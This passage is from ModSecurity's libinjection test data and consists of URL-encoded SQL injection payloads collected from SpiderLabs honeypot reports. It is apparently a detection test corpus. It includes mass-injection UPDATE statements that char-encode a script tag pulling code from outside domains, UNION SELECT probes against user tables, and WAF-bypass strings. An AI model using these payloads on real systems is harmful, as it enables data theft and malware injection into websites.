-2908%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349%2C9349--%20 -8805%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530%2C3530--%20 -7166%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353%2C9353--%20 -2168%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655%2C2655--%20 -7584%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434%2C9434--%20 -2152%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683%2C8683--%20 -9341%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528%2C3528--%20 -8703%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378%2C2378--%20 modsecurity-v3.0.4/others/libinjection/data/sqli-spiderlabs-201205.txt0000644000175000017500000001527413607066311025775 0ustar zimmerlezimmerle# # http://blog.spiderlabs.com/2012/05/mass-sql-injection-payload-analysis.html # 21+update+Categories+set+Category_Title=cast(Category_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 21+update+Categories+set+Category_Title=REPLACE(cast(Category_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 21+update+Content+set+Content_Title=cast(Content_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 21+update+Content+set+Content_Title=REPLACE(cast(Content_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 21+update+Homepage+set+Homepage_Title=cast(Homepage_Title+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(103)%2Bchar(98)%2Bchar(121)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(104)%2Bchar(110)%2Bchar(106)%2Bchar(104)%2Bchar(107)%2Bchar(109)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 21+update+Homepage+set+Homepage_Title=REPLACE(cast(Homepage_Title+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(110)%2Bchar(105)%2Bchar(107)%2Bchar(106)%2Bchar(106)%2Bchar(117)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(32)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- modsecurity-v3.0.4/others/libinjection/data/sqli-spiderlabs-201112.txt0000644000175000017500000000721713607066311025770 0ustar zimmerlezimmerle# # http://blog.spiderlabs.com/2011/12/honeypot-alert-sql-injection-scanning-update-filter-evasions-detected.html # 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C0x33633273366962%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 200%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2Fall%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C3%2C4%2C5%2C6%2C0x33633273366962%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%22%2F%2A%2A%2FuNiOn%2F%2A%2A%2FALL%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 4%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 222%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C2%2C0x33633273366962%2C4%2C5%2C6%2C7%2C8%2F%2A%2A%2FfRoM%2F%2A%2A%2Fmos_users-- 35022%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F1%2C0x33633273366962%2C3%2C4%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 1%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2C0x33633273366962%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- 2%2F%2A%2A%2FuNiOn%2F%2A%2A%2FsELeCt%2F%2A%2A%2F0x33633273366962%2C2%2F%2A%2A%2FfRoM%2F%2A%2A%2Fjos_users-- modsecurity-v3.0.4/others/libinjection/data/sqli-spiderlabs-201107.txt0000644000175000017500000002364513607066311025777 0ustar zimmerlezimmerle# http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #1 0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user # http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #4 1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*- # http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #6 -2%20div%201%20union%20all%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yea%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%23yeaah%0A%23yeah%20babc%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafs